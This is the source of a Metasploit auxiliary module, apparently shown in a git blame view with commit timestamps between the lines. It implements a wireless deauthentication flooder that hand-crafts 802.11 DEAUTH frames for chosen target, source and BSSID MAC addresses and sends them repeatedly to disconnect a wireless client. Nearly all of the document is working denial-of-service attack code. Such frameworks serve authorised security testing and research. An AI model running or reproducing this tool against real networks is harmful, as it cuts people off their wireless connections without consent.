2010-04-30 08:40:19 +00:00
|
|
|
##
|
2013-10-15 18:50:46 +00:00
|
|
|
# This module requires Metasploit: http//metasploit.com/download
|
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2010-04-30 08:40:19 +00:00
|
|
|
##
|
|
|
|
|
2008-04-21 05:41:53 +00:00
|
|
|
require 'msf/core'
|
|
|
|
|
2008-10-02 05:23:59 +00:00
|
|
|
class Metasploit3 < Msf::Auxiliary
|
2008-04-21 05:41:53 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
include Msf::Exploit::Lorcon2
|
|
|
|
include Msf::Auxiliary::Dos
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def initialize(info ={})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => 'Wireless DEAUTH Flooder',
|
|
|
|
'Description' => %q{
|
|
|
|
This module sends 802.11 DEAUTH requests to a specific wireless peer,
|
|
|
|
using the specified source address and source BSSID.
|
|
|
|
},
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
'Author' => [ 'Brad Antoniewicz' ],
|
|
|
|
'License' => MSF_LICENSE
|
|
|
|
))
|
2010-09-20 08:06:27 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
OptString.new('ADDR_DST',[true, "TARGET MAC (e.g 00:DE:AD:BE:EF:00)"]),
|
|
|
|
OptString.new('ADDR_SRC',[true, "Source MAC (e.g 00:DE:AD:BE:EF:00)"]),
|
|
|
|
OptString.new('ADDR_BSS',[true, "BSSID (e.g 00:DE:AD:BE:EF:00)"]),
|
|
|
|
OptInt.new('NUM',[true, "Number of frames to send",100])
|
|
|
|
],self.class)
|
|
|
|
end
|
2008-04-21 05:41:53 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def run
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
print_status("Creating Deauth frame with the following attributes:")
|
|
|
|
print_status("\tDST: #{datastore['ADDR_DST']}")
|
|
|
|
print_status("\tSRC: #{datastore['ADDR_SRC']}")
|
|
|
|
print_status("\tBSSID: #{datastore['ADDR_BSS']}")
|
2008-04-21 05:41:53 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
open_wifi
|
2008-04-21 05:41:53 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
print_status("Sending #{datastore['NUM']} frames.....")
|
2008-04-21 05:41:53 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
datastore['NUM'].to_i.times do
|
|
|
|
wifi.write(create_deauth())
|
|
|
|
end
|
|
|
|
close_wifi
|
|
|
|
end
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def create_deauth
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
seq = [rand(255)].pack('n')
|
|
|
|
frame =
|
|
|
|
"\xc0" + # Type/SubType
|
|
|
|
"\x00" + # Flags
|
|
|
|
"\x3a\x01" + # Duration
|
|
|
|
eton(datastore['ADDR_DST']) + # dst addr
|
|
|
|
eton(datastore['ADDR_SRC']) + # src addr
|
|
|
|
eton(datastore['ADDR_BSS']) + # BSSID
|
|
|
|
seq + # sequence number
|
|
|
|
"\x07\x00" # Reason Code (nonassoc. sta)
|
|
|
|
return frame
|
|
|
|
end
|
2008-11-13 06:27:31 +00:00
|
|
|
end
|